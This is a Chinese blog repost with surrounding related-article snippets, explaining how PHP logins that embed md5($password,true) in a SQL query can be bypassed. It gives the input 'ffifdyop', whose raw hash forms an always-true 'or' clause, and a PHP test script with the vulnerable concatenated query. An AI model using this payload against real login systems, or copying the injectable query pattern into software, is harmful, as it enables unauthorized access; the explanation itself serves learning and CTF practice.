MD5加密后的SQL 注入

于 2015-05-19 16:17:54 发布 12918 收藏 5
分类专栏: 非安全 文章标签: md5 sqlinjection

转自:http://www.joychou.org/index.php/web/SQL-injection-with-raw-MD5-hashes.html?utm_source=tuicool

今天看到 $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; 这样一个sql,其实可以注入。

思路比较明确,当md5后的hex转换成字符串后,如果包含 'or'<trash> 这样的字符串,那整个sql变成

SELECT * FROM admin WHERE pass = ''or'6<trash>'

很明显可以注入了。

难点就在如何寻找这样的字符串,我只是顺手牵羊,牵了一个。。

提供一个字符串:ffifdyop

md5后,276f722736c95d99e921722cf9ed621c

再转成字符串: 'or'6<trash>

测试代码:

<?php 
error_reporting(0);
$link = mysql_connect('localhost', 'root', '');
if (!$link) { 
  die('Could not connect to MySQL: ' . mysql_error()); 
} 
// 选择数据库
$db = mysql_select_db("test", $link);
if(!$db)
{
  echo 'select db error';
  exit();
}
// 执行sql
$password = "ffifdyop";
$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
var_dump($sql);
$result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' );
$row1 = mysql_fetch_row($result);
var_dump($row1);
mysql_close($link);
?>

效果:

Turisla
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
yy
05-05 15万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
一个简单的后台与数据库交互的登录与注册[sql注入处理、以及MD5加密]
09-10
主要介绍了一个简单的后台与数据库交互的登录与注册,包含sql注入处理、以及MD5加密知识点介绍
C#实现登陆程序(MD5加密SQL存储过程防注入攻击)
03-20
VS2013写的包含MD5加密和存储过程防注入攻击,都写在一个类里面,存入数据库的是MD5加密后的密码(是使用存储过程存储的),内含分离出的数据库
SQl SERVER md5加密
GuoGuoABC
03-26 1136
select substring(sys.fn_sqlvarbasetostr(HashBytes('md5','pass密码明文')),3,32)
PHP中MD5加密的简单绕过及基于MD5加密SQL注入
Landasika的博客
12-10 4088
部分内容参考于: sql注入md5($password,true)_March97的博客-CSDN博客_md5($pass,true) 目录 一、简介 二、基于PHP漏洞的绕过 1、MD5弱比较“==”绕过 2、MD5强比较“===”绕过 三、有关SQL注入MD5绕过 1、起因 2、注入原理 一、简介 md5() 函数计算字符串的 MD5 散列。 MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来..
总结Sql Server内置函数实现MD5加密
diaoshanwai2368的博客
02-14 330
--MD5加密 --HashBytes ('加密方式', '待加密的值') --加密方式= MD2 | MD4 | MD5 | SHA | SHA1 --返回值类型:varbinary(maximum 8000 bytes) select HashBytes('MD5','123456') --HashBytes生成的结果为:0xE10ADC3949BA59ABBE...
【mysql加密与解密函数
兮动人
02-25 6853
加密与解密函数 加密与解密函数主要用于对数据库中的数据进行加密和解密处理,以防止数据被他人窃取。这些函数在保证数据库安全时非常有用。 函数 用法 PASSWORD(str) 返回字符串str的加密版本,41位长的字符串。加密结果不可逆,常用于用户的密码加密 MD5(str) 返回字符串str的md5加密后的值,也是一种加密方式。若参数为NULL,则会返回NULL SHA(str) 从原明文密码str计算并返回加密后的密码字符串,当参数为NULL时,返回NULL。SHA加密算法比M
T-SQL[MD5算法实现]
woolnil的专栏
01-21 423
IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = OBJECT_ID(N'[dbo].[MD5_m_OnBits]') AND xtype IN(N'FN', N'IF', N'TF')) DROP FUNCTION [dbo].[MD5_m_OnBits] GO /***************************************************************************** * Name: MD5_m_OnBit
sqlserver 进行MD5加密
weixin_33700350的博客
09-18 1157
官方定义函数: HashBytes ( '<algorithm>', { @input | 'input' } ) <algorithm>::= MD2 | MD4 | MD5 | SHA | SHA1 参数解释: algorithm:标识用于对输入执行哈希操作的哈希算法。这是必选参数,无默认值。需要使用单引号。 @input : 数据类型为 varch...
sql注入md5($password,true)
March97的博客
07-27 1万+
       前几天做了一道CTF的题目,是在”实验吧“的一道简单的web题目,当然这道题目很多人都解出来了,因为它的.php文件名就是答案。        他的网页链接里面的php文件名就是’ffifdyop.php‘。          上面的’ffifdyop‘就是我们要输入的密码。哦,忘了介绍,这道题目只需要表单提交密码。       当然如果直接输入ffifdyop,提交后就能出...
MD5加密下的SQL注入
qq_35900276的博客
11-03 5255
转自:http://www.joychou.org/index.php/web/SQL-injection-with-raw-MD5-hashes.html?utm_source=tuicool 做题的时候看到下面这个句子: $sql="select password from users where password='".md5($password,true)."'" 这里面的md5
sql md5 加密函数
08-19
* Name: T-SQL MD5算法实现 * Author: Rambo Qian * Create Date: 2003-04-10 * Last Modified by: Rambo Qian * Last Update Date: 2003-04-16 * Version: V1.0.00
加密解密类文件
02-19
可用于文字加密解密,防止sql注入,提高程序的安全性,
PHP无敌近乎加密方式!
12-17
因为本人对sql注入比较喜欢 前前后后 检测过不少网站 aspphpjsp 发现基本都是用md5加密算法 都说 MD5 不可逆 无法破 对 MD5是无法逆 可是可以暴力破 只需要把常用的密码 MD5后 放数据库里 别人只需要提供MD5密码 ...
精英影视系统 v6.0 SQL
03-26
 2,会员等级制度,其中会员类型更细,点卡,包月用户具全;  3,用户操作多样化,包括,看,下载,留言,冲值,... 42,增加防止SQL注入式攻击手段;  43,HTML栏目增加所有影片;  44,增加免费电影HTML生成;
Discuz!NT 论坛整合ASP程序论坛教程
01-20
–#include file=”md5.asp”–> //32位md5加密文件,一定得调用,该文件到处有,我就不提供了 <% dim Username,Password,Question,Answer,Expires,Verify Username=replace(trim(Request.form(“Username”)),...
MD5+sql注入
chuifengji2的博客
04-12 614
MD5+sql注入 今天做题的时候看到一个题,打开后是一个简单的登录页面,第一反应是sql注入,但是试了各种姿势后发现都不成功。 burp抓包后查看response发现密码被md5加密了 查询md5函数的参数后,发现第二个参数为true时将传入的第一个参数转化为16字符二进制格式,于是我们去求助一下度娘,发现有一些字符串符合如下要求: ffifdyop; e58; 4611686052576742...
mysql中进行md5加密
热门推荐
wenzi49312的专栏
08-21 4万+
如果数据库表User中有一列为passwd,存放的是md5加密的数据,如何更新新的数据。 update user set passwd=md5("123321") where uName="lihua"; 插入新的数据: insert into user(uName,passwd) values("xiaoqiang",md5("123321")) ; 这样存放在数据中的密码信息就是保密存
一个绕过MD5SQL注入技巧
hi_xpf的博客
04-12 4874
http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php 隐藏在注释里的提示: $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=my...
java md5加密解密
最新发布
06-06
Java中的MD5加密解密是利用MD5(Message Digest Algorithm 5)算法对字符串进行加密和解密。MD5是一种不可逆的加密方式,也就是说,加密后的结果无法通过逆向计算得到原文。 在Java中,可以使用java.security.MessageDigest类来实现MD5加密和解密。具体步骤如下: 加密: 1. 获取MessageDigest实例,并指定加密方式为MD5: MessageDigest md5 = MessageDigest.getInstance("MD5"); 2. 将需要加密的字符串转换为字节数组: byte[] byteArray = str.getBytes(); 3. 对字节数组进行加密md5.update(byteArray); 4. 获取加密后的字节数组: byte[] resultByteArray = md5.digest(); 5. 将字节数组转换为十六进制字符串: StringBuilder builder = new StringBuilder(); for(byte b : resultByteArray) { builder.append(String.format("%02x", b)); } String result = builder.toString(); 解密: 由于MD5是一种不可逆的加密方式,因此无法进行解密。 总之,Java中的MD5加密解密是一种常用的加密方式,可以对保密性要求较高的信息进行加密,从而保证信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值